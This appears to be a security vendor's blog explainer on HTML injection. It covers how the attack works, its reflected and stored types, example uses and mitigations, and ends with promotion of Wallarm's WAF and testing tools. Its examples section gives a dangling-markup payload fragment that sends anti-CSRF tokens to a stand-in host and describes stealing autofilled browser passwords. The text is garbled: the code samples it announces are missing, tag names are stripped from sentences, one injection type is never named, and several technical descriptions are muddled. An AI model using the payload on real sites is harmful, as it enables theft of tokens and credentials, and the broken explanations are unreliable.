HTML Injection - What is it?
This attack is a leading type of cyber vulnerability taking advantage of weak website components. Most of the web pages that we see today are created using HTML or Hypertext Markup Language and it decides how any of the web data will display to the users as they access a specific web page in the browser. Using the visualization commands of the web page, the language helps website developers decide how a web page will look in real time.
Presently, the webpages websites use are highly interactive and it’s often considered that the previous user actions impact the webpage content.
In case of unverified user inputs, the web pages or applications will be vulnerable to an attack.
Skilled hackers take advantage of this loophole and use inject HTML injections in those web pages. In this attack, bad actors fabricate inputs using which they successfully insert an HTML code into the user-generated response of an HTML-based application.
How Does HTML Injection Work?
Functionality-wise, HTML injection looks very similar to XSS attacks as they both follow the same delivery path The attack takes place when an ill-intended user or hacker inserts an HTML code in the unverified input and prompts the browser to consider it as an integral part of HTML language of the targeted webpage.
The prime target of this attack is the user. Web server is not a concern for HTML injection.
Speaking of the intent, HTML injection is planned mainly because of two goals:
- To modify the website appearance so that the website’s reputation is tarnished
- To snatch the identity of someone authorized
The attack is executed using the links and data input fields of the targeted website.
To bring this attack into action, hackers start identifying the weak HTML codes of websites and inserting an HTML injection. Mainly, website components like comments, search bars, and contact forms are used to insert HTML injection as these elements are used by a large crowd and are less likely to be of top-notch quality.
For instance, hackers can post an engaging comment and insert HTML code snippets that will redirect the commenters to a corrupted web page or will prompt them to download malware. Let’s explain the functionality of this attack with the help of a questionnaire form that most websites have to let their users properly forward their concerns and queries.
As a user fills out these questionnaire forms on any of the websites, details like concerns, name, email address, and phone numbers are shared. Upon submission of this form, an acknowledgment message is shared instantly. To users, this acknowledgment message will look like this:
The corresponding code for this message will be:
As the code is easy to edit and is highly vulnerable, hackers will have the hassle of inserting an HTML injection in the code.
Consequences of the Attack
When successful, an HTML injection attack can lead to multiple security concerns that include:
XSS attacks: HTML injection is one of the many techniques that threat actors use to plan an XSS attack on a set of users. With this, hackers can gain access to key information like user credentials and purchase passwords and use them to take harmful actions like extracting money from the bank account or stealing the passwords of important accounts.
Website defacement: Hackers use HTML injection to defame websites as they can modify the webpage content with this method. Threat actors can make the webpage display offensive content or even can make a website completely unusable.
Dispersal of malware: Hackers often use HTML injection or code injection techniques to distribute malware or viruses to the masses.
Loss of trust: When a website is unresponsive or displays inappropriate content, users won't feel comfortable accessing such a website. Hence, there will be a huge drop in user -engagement.
Types of HTML Injection
There are two HTML injection varieties that hackers use to plan an attack.
The second HTML injection type is stored HTML injection and it involves storing the payload on the servers for future use. HTML codes are generated in bulk and stored on the server so that hackers can access them whenever they want. Hackers use this variety when they have to target multiple users in one go.
This method is the commonly used variety and it involves delivery of payload or HTML code to every target specifically. There is no bulk delivery. Hence, it may consume more time. But, it has a high success rate as the code is embedded into the webpage with more perfection.
Based on the HTTP method used, reflected HTML injection is further divided into three categories: reflected GET, reflected POST, and reflected URL. Reflected URL refers to the injection delivery via the URL of a website.
In the reflected GET injection type, data is requested while reflected request POST means data is delivered. Haceks often check the webpage source to learn which method is suitable for which website element.
For instance, threat actors inspect the login form’s source code to find out the appropriate injection method.
HTML Injection Example
Based on the purpose and intention of the attack, hackers can use multiple types of HTMLinjection payloads. Here are the examples of most commonly used HTML injection techniques.
- Exfiltrating sensitive user data
Accessing crucial information of specific users is another very common use case of this attack. Hackers introduce HTML injection payloads to a website form that is created to collect data like user name, email, and contact details.
Contact forms, questionnaires, and comments are some of the many examples of these types of forms. Hackers use these forms to plan an HTML injection attack as they enter a corrupted code in this form to prompt counterfeit login.
In the case of a URL-based webpage, hackers use tag to acquire sensitive data.
to hijack data. href='http://example.com/'> is the code that bad actors use to insert the respective URL of the webpage.
In addition to this, hackers also acquire fully validated HTML forms by inserting the tag before a verified tag.
- Exfiltrating anti-CSRF tokens
If hackers are planning an elaborated CSRF attack then they use HTML injection payloads to exfiltrate the anti-CSRF token that is delivered using the hidden input of a form.
Hackers need a non-terminated tag to exfiltrate the token. For the success of this action, the tag must be featuring single quotes like <img src='http://example.com/record.php?.
It’s because of the single quote that the remaining content of the quote will be considered as the URL part. If double quotes are there, the hidden input will be forwarded to the threat actors in a highly controlled record.php script and will be recorded as:
Alternatively, cyberpunks can use tag to exfilter the CSRF token. When this stage is used, the content after the tag will only be submitted as the input and and tags will be closed.
However, hackers need to ensure that users are submitting the forms manually.
Perhaps the most austere example of this attack is defacing which simply means changing the actual appearance of a website by modifying certain visual components.
For instance, hackers can insert HTML injections in the video ads that a business is marketing across the channels.
Defacing is mainly done to harm the brand reputation of a business’s website/page.
- Exfiltrating passwords stored in the browser
Lastly, we would like to inform you that HTML injections are widely used to extract the auto-filled passwords that a webpage is storing. Hackers need to create a compatible form for this. As the form is created, the password manager will supply the auto-saved passwords in no time.
How is This Attack Different From the Others?
The cyber vulnerability profile is so diverse that many attacks share great similarities. For example, XSS and HTML-injection. However, no two loopholes are the same. They only share a fragment of characteristics.
However, it’s more powerful when it comes to alerting the website's appearance and user experience. Rest attacks, which we mentioned above, are not often concerned with website appearance modification. But, HTML injection can change crucial website elements and can impact the website performance and user experience.
As websites play a crucial role in brand building and customer reach, businesses can’t take HTML injection attacks lightly just because it possesses a minimal threat to databases.
When it comes to data stealing, XSS and HTML injection work in a very similar fashion. Both these attacks are HTML based and aim to steal user identity information.
Mitigation and Prevention HTML Injection
No cyber risk should be taken lightly. In fact, AppSec professionals must have appropriate remedies in place to fix, prevent, and mitigate any sort of vulnerabilities ASAP. Below mentioned are some viable ways to control the spread and risks of HTML injections.
- The first and foremost HTML injection prevention principle is to validate output and inputs as the attack only targets non-verified inputs/outputs.
- Second, experts recommend inspecting every input and finding out if there is any HTML or script code mentioned in the inputs. Many tools are there to help you out in the process.
- The adoption of good security testing practices is also very viable to control the spread of these attacks. Try using automated testing tools so that no single website component is missed from being tested.
- When mitigation is concerned, using a WAF or Web Application Firewall is a great technique to adopt. With WAF, website owners can stop hackers or users from modifying the input codes. This way, HTML codes can’t be a part of website inputs. The use of a CSP or Content Security Policy is also useful to mitigate this type of attack. However, you need to understand that this policy is not applicable in every use case. Hence, you need to adopt other ways as well.
HTML Injection Protection with Wallarm
Just because HTML injection has no serious threats to the databases, organizations shouldn’t overlook HTML injection and take appropriate actions to control its impact and even prevent it from happening.
Wallarm provides a wide range of solutions that enterprises can implement in any cloud environment to control HTML injection. For instance, it provides a highly responsive cloud-based WAAP tool that can inspect every website component in real-time and prevent their modifications.
The tool ditches outdated RegEX techniques for vulnerability detection. Hence, it has fewer false positive and false negative incidences. With one tool, enterprises can protect all sorts of APIs, microservices, and cloud ecosystems.
Though Wallarm WAF is an expert choice, Wallarm provides a highly advanced WAF testing tool for those using customized WAF. GoTestWAF is a platform by Wallarm that can help organizations to check the real-time functionalities of WAF and find out if the WAF is worth a try or strong enough to provide considerable protection against HTML injection attacks.
For accurate detection of HTML injection and the alike, you can try the API security and testing tools that can perform code-by-code security scanning and detect any vulnerabilities.